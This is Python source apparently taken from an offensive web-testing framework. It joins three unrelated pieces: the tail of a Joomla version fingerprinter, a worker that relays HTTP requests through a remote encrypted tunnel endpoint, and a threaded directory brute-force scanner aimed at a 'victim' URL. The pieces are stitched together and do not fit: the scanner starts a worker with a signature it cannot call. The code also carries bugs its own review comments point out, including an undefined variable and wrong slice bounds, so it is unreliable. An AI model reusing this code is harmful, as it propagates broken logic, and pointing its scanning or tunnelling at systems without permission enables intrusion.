                 ['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'],
                 ['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'],
                 ['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'],
                 ['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'],
                 ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'],
                 [
                     'Copyright (C) 2005 - 2010 Open Source Matters',
                     '1.5.16.Stable-1.5.20.Stable'
                 ],
                 ['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'],
                 ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
                 ['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'],
                 ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
                 ['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'],
                 ['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'],
                 ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
                 ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable']]
            ],
            [
                'components/com_contact/metadata.xml',
                [['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'],
                 ['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'],
                 ['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable']]
            ],
            [
                'htaccess.txt',
                [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'],
                 ['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'],
                 ['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'],
                 ['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'],
                 ['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'],
                 ['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'],
                 ['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'],
                 ['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'],
                 ['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'],
                 ['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'],
                 ['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'],
                 ['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'],
                 ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
                 ['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
                 ['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable']]
            ],
            [
                'administrator/language/en-GB/en-GB.ini',
                [[
                    'version 1.5.x 2005-10-30 14:10:00',
                    '1.5.0.Beta-1.5.0.Beta'
                ], ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'],
                 ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
                 ['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'],
                 ['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'],
                 ['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'],
                 ['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'],
                 ['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'],
                 ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'],
                 ['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'],
                 ['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'],
                 ['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'],
                 ['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'],
                 ['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'],
                 ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
                 ['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'],
                 ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
                 ['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'],
                 ['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'],
                 ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'],
                 ['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'],
                 ['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'],
                 ['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'],
                 ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'],
                 ['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'],
                 ['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable']]
            ],
            [
                'language/en-GB/en-GB.com_media.ini',
                [['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'],
                 ['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'],
                 ['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'],
                 ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
                 ['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'],
                 ['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'],
                 ['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'],
                 ['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable']]
            ],
            [
                'configuration.php-dist',
                [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'],
                 ['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'],
                 ['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'],
                 ['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'],
                 ['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'],
                 ['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'],
                 ['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'],
                 ['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'],
                 ['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'],
                 ['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'],
                 ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable']]
            ]
        ]
        requester = HTTP(url)

        # First pass: the first signature found in a 200 body wins; stop at the first file
        # that identifies a version.
        for path, signatures in storeversion:
            frmwk.print_status('Checking: ' + url + path)
            body = requester.Request(url + path)
            if requester.response.status == 200:
                self.version = next(
                    (label for needle, label in signatures if needle in body),
                    None)
            if self.version:
                break

        # Second pass: manifests carrying an explicit <version> element.
        for path in ('language/en-GB/en-GB.xml',
                     'components/com_mailto/mailto.xml'):
            if self.version:
                break
            frmwk.print_status('Checking: ' + url + path)
            body = requester.Request(url + path)
            if requester.response.status == 200:
                found = search('<version>(.*?)</version>', body)
                if found:
                    self.version = found.group(1)

        if self.version:
            frmwk.print_success('Fount version: ' + self.version)
        else:
            frmwk.print_error('Unknown version !')
    def worker(self, c_conn, c_addr):
        """Relay one accepted client HTTP request through a tunnel endpoint.

        The request line and headers are read from ``c_conn``; the request
        line is rewritten to carry only the path, ``Proxy-*`` headers are
        dropped and ``Connection: close`` is forced.  The rewritten request
        (optionally encrypted with ``crypton``) is sent to the tunnel as the
        body of a POST, and whatever the tunnel returns is streamed back to
        the client.  On the normal path both ends are closed in the
        ``finally`` block; the two early-return paths below do not close
        ``c_conn``.

        Args:
            c_conn: accepted client socket (``recv``/``send``/``close``).
            c_addr: client address; used only in status messages.

        Returns:
            None.  An unreachable tunnel or a request target that does not
            start with ``http`` ends the worker early with an error message.
        """
        self.frmwk.print_status("Accept new connect from  " + str(c_addr))
        ################### CONNECT TUNNEL #####################
        ### choose a tunnel and connect to it
        # c_tunnel[0] is the tunnel URL (also passed to t_conn.init below);
        # c_tunnel[2] is the key material handed to crypton.
        c_tunnel = self.choin_tunnel()  # choose one tunnel
        t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout)

        ### check tunnel is open
        # NOTE(review): this assumes HTTP(...) yields a falsy object when the
        # connection fails rather than raising -- confirm against HTTP.
        if not t_conn:
            self.frmwk.print_error('Can\'t connect to tunnel')
            return None
        ### encrypt/decrypt init
        # tunnel_ks 	= self.vc_generatekeyhash(c_tunnel[2])
        # tunnel_pe 	= self.vc_init(c_tunnel[2],tunnel_ks)
        # tunnel_pd 	= dict((tunnel_pe[i],i) for i in range(0,len(tunnel_pe)))
        if self.encrypt:
            crypt = crypton(c_tunnel[2])
        else:
            crypt = None
        ################### START READ DATA CLIENT #####################
        ### get request line, headers and declared body length from the socket
        c_status, c_headers, c_content_len = self.socket_receiver(c_conn)

        ### set url, host, port, method
        # c_status[1] is the request target.  Everything here is bytes, hence
        # the b'...' literals.
        s_https = 0
        host = c_status[1]
        if host.startswith(b'http'):
            parser = parse.urlparse(host)
            s_host = parser.hostname
            s_port = parser.port
            # The path is everything after the third '/' of the absolute URL.
            # NOTE(review): a target with no path after the authority splits
            # into fewer than four parts and this raises IndexError.
            s_path = b'/' + host.split(b'/', 3)[3]
            if not s_port:
                # NOTE(review): `host` is bytes, so urlparse yields a bytes
                # scheme; comparing it with the str 'https' can never be true
                # on Python 3, which leaves the 443 / s_https branches
                # unreachable.  Presumably b'https' was intended -- confirm.
                if parser.scheme == 'https':
                    s_port = 443
                else:
                    s_port = 80
            if parser.scheme == 'https':
                s_https = 1
        else:
            self.frmwk.print_error("Unknown client request connect !")
            return None

        ### request line sent onward: method, path-only target, HTTP version
        c_send_header = [b' '.join([c_status[0], s_path, c_status[2]])]

        ### set header for send
        c_headers.update({b'Connection': b'close'})  # fix host delay
        for k, v in c_headers.items():
            # Proxy-* headers are meant for this proxy; do not forward them.
            if k.startswith(b'Proxy'):
                continue
            c_send_header.append(k + b': ' + v)

        ## join request line and headers into one CRLF-terminated block
        c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n"

        ### build the tunnel's init parameters (opaque here; see send_init)
        c_send_init = self.send_init(s_host, s_port, self.r_buffer,
                                     self.s_buffer, s_https, c_tunnel, crypt)

        ### the tunnel POST body is: init block + request head + client body
        t_conn.init(
            c_tunnel[0], 'POST', {
                'Content-Length':
                len(c_send_init) + len(c_send_header) + c_content_len
            })
        t_conn.send(c_send_init)

        del c_send_init  # clear memory

        ### get content from client and send to server with r_buffer
        if c_content_len > 0:
            c_sent = 0
            ####### send header with content for full r_buffer encrypt
            # A few body bytes are glued onto the header before encrypting,
            # presumably to align the first encrypted chunk with the key
            # length.  NOTE(review): len(header) + len(header) % keylen is not
            # in general a multiple of keylen, so if alignment is the intent
            # the arithmetic looks off -- confirm against crypton.
            if self.encrypt:
                mod_len = len(c_send_header) % len(c_tunnel[2])
                # NOTE(review): recv(mod_len) may return fewer than mod_len
                # bytes (or b'' on EOF); c_sent below assumes the full amount.
                data = c_conn.recv(mod_len)
                data = c_send_header + data
                data_len = len(data)
                for i in range(0, data_len, self.r_buffer):
                    # NOTE(review): the upper slice bound `data_len - i`
                    # shrinks as i grows; `min(i + self.r_buffer, data_len)`
                    # looks intended -- confirm.
                    t_conn.send(
                        crypt.vc_encrypt(
                            data[i:min(i + self.r_buffer, data_len - i)]))
                c_sent = mod_len
            else:
                t_conn.send(c_send_header)

            ###### send content
            if c_sent < c_content_len:
                while True:
                    data = c_conn.recv(
                        min(self.r_buffer, c_content_len - c_sent))
                    if self.encrypt:
                        t_conn.send(crypt.vc_encrypt(data))
                    else:
                        t_conn.send(data)

                    c_sent += len(data)
                    # NOTE(review): `content_lent` is not defined in this
                    # method -- this raises NameError on the first iteration
                    # where data is non-empty; `c_content_len` was presumably
                    # meant.
                    if not data or c_sent == content_lent:
                        break
        else:
            if self.encrypt:
                t_conn.send(crypt.vc_encrypt(c_send_header))
            else:
                t_conn.send(c_send_header)
        del c_send_header  # clear memory
        ############## END SEND ################
        ############# START RECV ###############
        # Stream the tunnel's reply back chunk by chunk; any error is reported
        # and both ends are closed regardless.
        try:
            for res_chunk in t_conn.recv(self.s_buffer):
                if self.encrypt:
                    c_conn.send(crypt.vc_decrypt(res_chunk))
                else:
                    c_conn.send(res_chunk)
        except Exception as e:
            self.frmwk.print_error(str(e))
        finally:
            t_conn.request.close()
            c_conn.close()

        self.frmwk.print_status("Closed connect from  " + str(c_addr))
    def run(self, frmwk, args):
        """Scan the target for directories/files from the configured wordlists.

        Loads DIRLIST/FILELIST, normalises URL to a trailing slash, builds the
        shared HTTP client (with the optional COOKIE header), calibrates what a
        "not found" response looks like for the chosen TYPE, runs filechecker
        on the URL itself and then starts THREADS worker threads.  Hits are
        collected in ``self.success`` and printed at the end.

        Args:
            frmwk: framework object; stored on ``self.frmwk`` for the workers
                and used here for its ``print_*`` helpers.
            args: unused.

        Returns:
            None.
        """
        self.frmwk = frmwk
        # Wordlists are optional; an unset option yields an empty list.
        self.dirs = ReadFromFile(FullPath(
            self.options['DIRLIST'])) if self.options['DIRLIST'] else []
        self.files = ReadFromFile(FullPath(
            self.options['FILELIST'])) if self.options['FILELIST'] else []
        # Normalise to a trailing slash so paths can be appended directly.
        self.url = self.options['URL'] if self.options['URL'].endswith(
            '/') else self.options['URL'] + '/'
        # 'lenght' (sic) is the spelling the TYPE option uses throughout; it
        # selects not-found detection by response length.
        self.type = self.options['TYPE']
        self.thread = self.options['THREADS']
        self.stop = self.options['STOP']
        self.extension = self.options['EXTENSION'].split(',')
        self.timeout = self.advanced_options['TIMEOUT']
        self.into = self.advanced_options['INTO']

        self.victim = HTTP(self.url, timeout=self.timeout)
        # Only set a Cookie header when one was configured.
        self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']}
                                   if self.advanced_options['COOKIE'] else {})

        self.success = []
        self.tmp_dirs = self.dirs + []  # shallow copy; workers consume this one
        self.current_dir = ''
        self.locker = Lock()

        # Calibration: request a path that should not exist and record how
        # the server answers, so the workers can tell hits from misses.
        if self.type in ['lenght', 'auto']:
            victim = deepcopy(self.victim)
            victim.redirect = False  # keep redirects visible for the status check below
            self.frmwk.print_status('Init not found infomation')
            victim.Request(self.url + 'ASDASdadhkjlhjfasdfawefa/', 'GET')

            if self.type == 'auto':
                # if victim.response.status == 404:
                # 	self.type	= 'status'
                # 	self.frmwk.print_success('auto get type: error')
                # el
                # A 200 for a bogus directory means misses are not signalled
                # by status, so compare body lengths instead; anything else
                # is handled as a redirect-based ('location') signal.
                if victim.response.status == 200:
                    self.type = 'lenght'
                    self.frmwk.print_success('auto get type: lenght')
                else:
                    self.type = 'location'
                    self.frmwk.print_success('auto get type: location')

            if self.type == 'lenght':
                self.notfounddir = len(victim.result)
            if self.type in ['lenght', 'location']:
                # Measures len() of Request()'s return value directly --
                # assumes Request returns the response body; confirm.
                self.notfoundfile = len(
                    victim.Request(
                        self.url + 'adfasdaszxcvzdczxfasASasda.' +
                        self.extension[0], 'GET'))
                self.offset = self.advanced_options['OFFSET']
            del victim

        if self.type == 'location':
            self.victim.redirect = False

        self.frmwk.print_status('Starting scanner')
        ########check file in current path######
        try:
            # The trailing slash is stripped for filechecker and restored
            # afterwards for the directory workers.
            if self.url.endswith('/'):
                self.url = self.url[:-1]
            self.filechecker(self.url)
            if not self.url.endswith('/'):
                self.url = self.url + '/'
            ########################################
            threads = []
            for i in range(self.thread):
                t = Thread(target=self.worker)
                threads.append(t)
                t.start()
            for t in threads:
                t.join()
        except KeyboardInterrupt:
            # NOTE(review): this handler cannot work as written: `threads` is
            # unbound if the interrupt arrives during filechecker (NameError),
            # Thread.isAlive() was removed in Python 3.9 (use is_alive()), and
            # threading.Thread has no terminate() (AttributeError).  Workers
            # are left running; the trailing `pass` is redundant.
            for t in threads:
                if t.isAlive():
                    t.terminate()
            pass
        if len(self.success) > 0:
            self.frmwk.print_success('Found list:\n-----------')
            for link in self.success:
                self.frmwk.print_success(link)
        else:
            self.frmwk.print_error('---------\nNot Found!\n---------')